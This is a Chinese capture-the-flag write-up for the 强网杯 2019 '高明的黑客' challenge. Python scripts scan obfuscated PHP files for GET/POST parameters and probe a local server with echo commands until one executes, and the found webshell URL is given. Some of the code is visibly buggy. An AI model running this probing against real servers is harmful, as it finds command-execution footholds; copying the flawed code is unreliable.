C
C
CTF-WriteUp
Search
⌃K

高明的黑客

D盾扫一堆混淆+shell,不过没有几个是能用的,需要跑个脚本,考察脚本编写能力的,测试一下哪个是能用的。
上py
import os
import requests
# 文件路径
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# 遍历文件目录查找文件
files = os.listdir(path=path)
# GET方法传参
def GET(filename):
f = open(path + filename, 'r')
getList = []
content = f.readlines()
for line in content:
if line.find("$_GET['") > 0:
startIndex = line.find("$_GET['") + 7
endIndex = line.find("'", startIndex)
getList.append(line[startIndex:endIndex])
return getList
# POST方法传参
def POST(filename):
f = open(path + filename, 'r')
postList = []
content = f.readlines()
for line in content:
if line.find("$_POST['") > 0:
startIndex = line.find("$_POST['") + 8
endIndex = line.find("'", startIndex)
postList.append(line[startIndex:endIndex])
return postList
if __name__ == "__main__":
for file in files:
if file != ".idea":
print("OPEN FILE:" + file)
get = GET(file)
for i in get:
url = "http://127.0.0.1/%s?$s=%s".format(file, i, 'echo "GET SUCCESS"')
response = requests.get(url=url)
if response.text.find("GET SUCCESS") > 0:
print("SUCCESS GET! YOU FIND THE SHELL %s BY %s".format(file, i))
exit(0)
post = POST(file)
for i in post:
url = "http://127.0.0.1/%s".format(file)
data = {i: 'echo "POST SUCCESS"'}
response = requests.get(url=url, data=data)
if response.text.find("POST SUCCESS") > 0:
print("SUCCESS POST! YOU FIND THE SHELL %s BY %s".format(file, i))
exit(0)
print("CLOSE FILE")
贼捞,大概一分钟跑七到八个这样子,算了算根本跑不完。
还是要多线程,最后参考大佬脚本搞的。
/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27
import os
import requests
import threading
import time
import sys
# 文件路径
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# 遍历文件目录查找文件
files = os.listdir(path=path)
# GET方法传参
def GET(filename):
f = open(path + filename, 'r')
getList = []
content = f.readlines()
for line in content:
if line.find("$_GET['") > 0:
startIndex = line.find("$_GET['") + 7
endIndex = line.find("'", startIndex)
getList.append(line[startIndex:endIndex])
return getList
# POST方法传参
def POST(filename):
f = open(path + filename, 'r')
postList = []
content = f.readlines()
for line in content:
if line.find("$_POST['") > 0:
startIndex = line.find("$_POST['") + 8
endIndex = line.find("'", startIndex)
postList.append(line[startIndex:endIndex])
return postList
def get_content(file):
print("OPEN FILE:" + file)
get = GET(file)
for i in get:
url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET '
'SUCCESS"')
response = requests.get(url=url)
if response.text.find("GET SUCCESS") > 0:
print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
f = open("shell.txt", "w")
f.write(response.text)
sys.exit(0)
post = POST(file)
for i in post:
url = "http://127.0.0.1/src/{}".format(file)
data = {i: 'echo "POST SUCCESS"'}
response = requests.get(url=url, data=data)
if response.text.find("POST SUCCESS") > 0:
print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
f = open("shell.txt", "w")
f.write(response.text)
sys.exit(0)
response.close()
print("CLOSE FILE")
if __name__ == "__main__":
s1 = threading.Semaphore(100)
requests.adapters.DEFAULT_RETRIES = 5
for file in files:
get_content(file)
t = threading.Thread(target=get_content, args=(file,))
t.start()